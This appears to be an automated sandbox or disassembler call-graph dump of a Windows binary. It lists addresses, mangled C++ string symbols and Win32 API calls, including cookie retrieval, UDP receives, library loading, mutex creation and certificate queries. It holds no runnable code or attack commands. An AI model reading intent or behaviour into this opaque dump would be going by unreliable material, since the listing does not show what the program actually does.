38948->38940 38950 10028a10 38949->38950 38954 100a7c05 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 38950->38954 38953 100a7d93 38952->38953 38957 100a7da8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38953->38957 38954->38946 38955->38942 38956 100a7c76 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 38955->38956 39126 10010060 38956->39126 38959 100a7de9 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38957->38959 38960 100a7dd6 38957->38960 38964 100a7e2d 38959->38964 38960->38959 38962 100a7e97 38960->38962 38961 100a7c9f ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38961->38942 38963 100a7f1f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38962->38963 38965 100a7ed1 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38962->38965 38967 100a7f15 38963->38967 38966 100a7e53 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38964->38966 38965->38967 38966->38962 38968 100a7f89 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38967->38968 38969 100a7fcf 38968->38969 38970 100a7fe4 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38969->38970 38971 100a802d 38970->38971 38993 100a8068 38970->38993 38973 100a803b ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 38971->38973 38974 100a804d ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ 38971->38974 38972 100a8370 38976 100a8376 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38972->38976 38973->38974 38974->38971 38974->38993 38975 100a8112 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 38977 100a814f 38975->38977 38978 100a8186 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38975->38978 38979 100a83bd 38976->38979 38980 100a815a ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 38977->38980 38981 100a816c ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ 38977->38981 38982 100a81ab ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ 38978->38982 38983 100a81c3 38978->38983 38994 100a83d2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38979->38994 38980->38981 38984 100a82a0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 38981->38984 38985 100a8243 ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 38982->38985 39101 10029600 38983->39101 38988 100a82d7 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38984->38988 38989 100a8344 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38984->38989 38991 100a828b ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38985->38991 38992 100a8259 38985->38992 38987 100a80c0 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 38987->38993 39003 100a831e 38988->39003 38989->38976 38991->38984 38997 100a8276 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ 38992->38997 38998 100a8264 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 38992->38998 38993->38972 38993->38975 38993->38987 38999 100a80da ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 38993->38999 39000 100a80ec ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ 38993->39000 38995 100a8416 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ 38994->38995 39005 100a8438 38995->39005 38997->38991 38998->38997 38999->39000 39000->38993 39003->38989 39004 100a84e0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39006 100a8527 39004->39006 39005->39004 39007 10001482 4 API calls 39005->39007 39008 100a853c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39006->39008 39009 100a847a 39007->39009 39010 100a8579 ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39008->39010 39011 100a86be ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39008->39011 39012 100013d0 4 API calls 39009->39012 39010->39011 39015 100a8592 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39010->39015 39013 100a8816 39011->39013 39014 100a86d7 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39011->39014 39016 100a848f ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39012->39016 39019 100a8a72 39013->39019 39022 100a8836 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII 39013->39022 39017 10001482 4 API calls 39014->39017 39018 10001482 4 API calls 39015->39018 39016->39004 39100 100d1423 __EH_prolog 39099->39100 39100->38939 39102 10029652 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39101->39102 39103 1002963e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39101->39103 39105 10029692 39102->39105 39106 10029680 ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 39102->39106 39104 100297a3 39103->39104 39107 10025980 2 API calls 39104->39107 39109 1002969d ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 39105->39109 39106->39105 39108 1002970b ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ 39106->39108 39110 100297bb 39107->39110 39113 1002971f 39108->39113 39111 10028a10 39109->39111 39118 100a4180 39110->39118 39112 100296db ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 39111->39112 39112->39108 39114 1002972f ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD 39113->39114 39115 1002976d ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39113->39115 39116 1000f130 39114->39116 39115->39104 39117 1002974c ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39116->39117 39117->39115 39119 100a41a6 39118->39119 39135 100a4110 InternetGetCookieA 39119->39135 39126->38961 39136 100a415f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39135->39136 39137 10055d40 39144 10055a20 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39137->39144 39139 10055d77 39140 10055d6b SetEvent 39143 10055d61 39143->39139 39143->39140 39145 10055a96 ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII 39144->39145 39146 10055a8f 39144->39146 39147 10055ab6 39145->39147 39148 10055cf8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39145->39148 39146->39145 39147->39148 39151 10055ad3 ??0?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H 39147->39151 39152 10055bdc 39147->39152 39149 10025980 2 API calls 39148->39149 39150 10055d2f 39149->39150 39150->39143 39171 10055950 39150->39171 39153 10055b17 39151->39153 39154 10055af6 39151->39154 39155 1001234b 87 API calls 39152->39155 39158 1001234b 87 API calls 39153->39158 39156 100019a2 9 API calls 39154->39156 39157 10055c01 39155->39157 39159 10055b03 ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@D 39156->39159 39160 10001482 4 API calls 39157->39160 39161 10055b21 39158->39161 39159->39153 39159->39154 39164 10055c19 GetPrivateProfileStringA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39160->39164 39162 10001482 4 API calls 39161->39162 39163 10055b39 ?str@?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2 39162->39163 39166 10055b64 WritePrivateProfileStringA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??_D?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 39163->39166 39168 10055cb2 39164->39168 39166->39148 39169 10009f50 Mailbox 2 API calls 39168->39169 39170 10055ce3 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39169->39170 39170->39148 39172 10055971 39171->39172 39173 100559ea 39171->39173 39174 1001234b 87 API calls 39172->39174 39175 100559f3 GetTickCount 39173->39175 39176 10055a0e 39173->39176 39177 1005598a 39174->39177 39183 100557f0 9 API calls 39175->39183 39176->39143 39179 10001482 4 API calls 39177->39179 39181 1005599f GetPrivateProfileIntA ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39179->39181 39180 10055a0b 39180->39176 39181->39173 39183->39180 39184 100a6a40 39185 100a6a87 39184->39185 39186 100a6a9b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39185->39186 39214 100a5820 39186->39214 39188 100a6ac4 39189 100a6b2c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39188->39189 39190 100a6c7c 39189->39190 39222 100090b0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39190->39222 39192 100a6cf8 39193 100a7396 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39192->39193 39194 100a73db 39193->39194 39195 100a7422 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39194->39195 39196 100a7488 39195->39196 39197 100a74cf ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE LoadLibraryA 39196->39197 39198 100a7510 GetProcAddress 39197->39198 39199 100a7575 FreeLibrary 39197->39199 39198->39199 39200 100a7524 39198->39200 39201 100a75d8 39199->39201 39202 100a758d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39199->39202 39205 100a7536 GetAcceptLanguagesA 39200->39205 39204 100a75dc ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39201->39204 39209 100a7646 39201->39209 39203 100a75ce 39202->39203 39208 100a7624 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39203->39208 39204->39203 39206 100a754b ?clear@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD 39205->39206 39207 100a7568 ??_V@YAXPAX 39205->39207 39206->39207 39207->39199 39208->39209 39223 10009120 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39209->39223 39211 100a76f6 39212 10025980 2 API calls 39211->39212 39213 100a7718 39212->39213 39224 100999cc 39214->39224 39218 100a586d 39219 100a587f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39218->39219 39220 10025980 2 API calls 39219->39220 39221 100a58dc 39220->39221 39221->39188 39222->39192 39223->39211 39225 100999d6 __EH_prolog 39224->39225 39229 10001000 RtlInitializeCriticalSection 39225->39229 39227 10099a0e 39228 10014360 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ InterlockedIncrement RtlInitializeCriticalSection 39227->39228 39228->39218 39229->39227 39230 42d98e 39231 42d9d2 39230->39231 39232 42d999 CreateEventW ResetEvent CreateThread 39230->39232 39232->39231 39233 42d9cb ResumeThread 39232->39233 39234 417695 39232->39234 39233->39231 39235 42d95b 39234->39235 39236 100106d0 39237 100106e0 39236->39237 39240 100103a0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 39237->39240 39243 100103e9 39240->39243 39241 1001069e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39242 10025980 2 API calls 39241->39242 39244 100106c5 39242->39244 39243->39241 39245 10010441 39243->39245 39274 10009e00 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0exception@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ _CxxThrowException 39243->39274 39247 100105a5 39245->39247 39254 10010471 39245->39254 39248 100105d1 39247->39248 39249 10010662 39247->39249 39250 10010220 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 39248->39250 39251 10010220 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 39249->39251 39252 100105e8 39250->39252 39263 1001056b 39251->39263 39276 10010370 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 39252->39276 39255 100258ac 3 API calls 39254->39255 39256 100104c9 39255->39256 39266 10010220 39256->39266 39261 10010220 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 39262 10010521 39261->39262 39262->39263 39275 10009f20 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39262->39275 39263->39241 39265 1001055f ??3@YAXPAX 39265->39263 39267 10010250 39266->39267 39268 10010299 39267->39268 39269 10010260 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 39267->39269 39270 100102b0 39268->39270 39269->39267 39271 100102e0 39270->39271 39272 10010329 39271->39272 39273 100102ef ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 39271->39273 39272->39261 39273->39271 39275->39265 39276->39263 39277 100119d0 39278 1001186b 70 API calls 39277->39278 39279 100119ff 39278->39279 39280 10011a05 39279->39280 39281 10011a16 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39279->39281 39282 10011185 6 API calls 39280->39282 39283 10011a12 39281->39283 39282->39283 39284 10025980 2 API calls 39283->39284 39285 10011a30 39284->39285 39286 423210 39287 42324f 39286->39287 39288 42326a 39287->39288 39289 42326f WaitForSingleObject 39287->39289 39290 4232bd GetTickCount 39287->39290 39291 4232a7 SetEvent 39287->39291 39289->39287 39300 4232cc 39290->39300 39291->39300 39292 42330d ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 39292->39300 39293 423326 OpenMutexW 39293->39300 39294 423346 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39296 418004 39294->39296 39295 423377 CloseHandle 39295->39300 39297 42335c ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39296->39297 39299 423375 39297->39299 39298 42338a ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39298->39300 39299->39288 39300->39287 39300->39290 39300->39292 39300->39293 39300->39294 39300->39295 39300->39298 39301 4233a0 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39300->39301 39301->39300 39302 423090 39303 4230d4 39302->39303 39304 423105 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39303->39304 39305 418004 39304->39305 39306 423121 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 39305->39306 39307 423133 39306->39307 39308 423139 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39307->39308 39309 423166 39308->39309 39310 423e90 39311 424185 39310->39311 39312 4241f7 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39311->39312 39313 418004 39312->39313 39314 424213 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 39313->39314 39315 418004 39314->39315 39316 424228 LoadLibraryW 39315->39316 39317 424238 39316->39317 39318 42424b ??0?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@H 39317->39318 39319 424338 GetProcAddress 39317->39319 39321 424264 39318->39321 39320 424353 39319->39320 39322 424362 GetProcAddress 39320->39322 39323 42437d 39320->39323 39324 42428a GetLastError 39321->39324 39322->39323 39325 4243ba 39323->39325 39326 42438c ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39323->39326 39327 418004 39324->39327 39329 4243e7 GetProcAddress 39325->39329 39330 42453c ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39325->39330 39328 4243af 39326->39328 39331 424299 ??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W 39327->39331 39336 42432d 39328->39336 39332 42440b 39329->39332 39330->39328 39333 4242c8 39331->39333 39334 424430 ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H 39332->39334 39335 424537 39332->39335 39338 4242ce ??$?6_WU?$char_traits@_W@std@@@std@@YAAAV?$basic_ostream@_WU?$char_traits@_W@std@@@0@AAV10@PB_W 39333->39338 39337 424449 39334->39337 39335->39330 39342 42446f GetLastError 39337->39342 39339 418004 39338->39339 39340 4242e2 ??6?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV01@K 39339->39340 39341 418004 39340->39341 39343 4242f1 ??_D?$basic_stringstream@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 39341->39343 39344 418004 39342->39344 39346 418004 39343->39346 39345 42447e ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD 39344->39345 39347 418004 39345->39347 39348 424311 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39346->39348 39349 4244c2 ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD 39347->39349 39348->39336 39350 418004 39349->39350 39351 4244d3 ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD 39350->39351 39352 418004 39351->39352 39353 4244e4 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@K 39352->39353 39354 418004 39353->39354 39355 4244f3 ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 39354->39355 39356 418004 39355->39356 39357 424513 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39356->39357 39357->39328 39358 422310 39360 422332 39358->39360 39359 422467 39362 42248f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39359->39362 39374 422620 39359->39374 39360->39359 39361 4223b2 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 39360->39361 39363 418004 39361->39363 39364 4224a6 39362->39364 39365 4223e0 CreateMutexW 39363->39365 39368 4224b6 ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W 39364->39368 39366 418004 39365->39366 39367 4223f4 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39366->39367 39369 422413 39367->39369 39371 418004 39368->39371 39376 422423 GetLastError 39369->39376 39370 42288c ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39387 42245c 39370->39387 39372 4224d7 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 39371->39372 39375 418004 39372->39375 39373 4226ad 39380 422713 39373->39380 39381 4226f3 CloseHandle 39373->39381 39384 42273c 39373->39384 39374->39373 39378 42268d CloseHandle 39374->39378 39377 4224ec GetPrivateProfileStringW 39375->39377 39379 422432 39376->39379 39389 422517 39377->39389 39382 4226a3 39378->39382 39379->39359 39383 422439 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39379->39383 39380->39384 39386 42271c CloseHandle 39380->39386 39385 422709 39381->39385 39382->39373 39383->39387 39384->39370 39391 422831 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 39384->39391 39385->39380 39388 422732 39386->39388 39388->39384 39390 422555 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ 39389->39390 39392 418004 39390->39392 39393 42284b 39391->39393 39394 422589 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39392->39394 39397 422870 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39393->39397 39395 418004 39394->39395 39396 4225a2 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 39395->39396 39398 418004 39396->39398 39399 418004 39397->39399 39400 4225b4 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 39398->39400 39399->39370 39401 4225c7 39400->39401 39402 4225f1 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39401->39402 39403 418004 39402->39403 39404 42260a ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39403->39404 39404->39374 39405 422f10 39406 422f51 39405->39406 39407 422f70 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39406->39407 39408 422f9b SetEvent 39406->39408 39414 422f93 39407->39414 39409 418004 39408->39409 39410 422fae CloseHandle 39409->39410 39411 418004 39410->39411 39412 422fc1 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 39411->39412 39413 422fe4 39412->39413 39413->39414 39415 1013bc40 RtlEnterCriticalSection 39416 1013bd7a RtlLeaveCriticalSection 39415->39416 39423 1013bc8e 39415->39423 39417 1013bd87 39416->39417 39419 10025980 2 API calls 39417->39419 39418 1013bc90 recvfrom 39420 1013bda5 WSAGetLastError 39418->39420 39418->39423 39421 1013bda1 39419->39421 39422 1013bdab RtlLeaveCriticalSection 39420->39422 39422->39417 39423->39416 39423->39418 39423->39422 39424 1013bd15 inet_ntoa 39423->39424 39424->39423 39425 1013bd24 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD htons 39424->39425 39426 1013bd57 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 39425->39426 39426->39423 39427 436c90 CryptQueryObject 39428 436cfe 39427->39428 39429 436d0b CryptMsgGetParam 39428->39429 39433 436efc 39428->39433 39430 436d28 39429->39430 39431 436d35 LocalAlloc 39430->39431 39432 436ed4 CertCloseStore 39430->39432 39435 436d4a 39431->39435 39434 418004 39432->39434 39436 436ee9 CryptMsgClose 39434->39436 39435->39432 39437 436d5d CryptMsgGetParam 39435->39437 39436->39433 39438 436d7f 39437->39438 39439 436ebe LocalFree 39438->39439 39440 436d8c CertFindCertificateInStore 39438->39440 39442 418004 39439->39442 39441 436de4 39440->39441 39441->39439 39443 436df1 CertGetNameStringW 39441->39443 39442->39432 39444 436e15 39443->39444 39445 436eab CertFreeCRLContext 39444->39445 39446 436e28 LocalAlloc 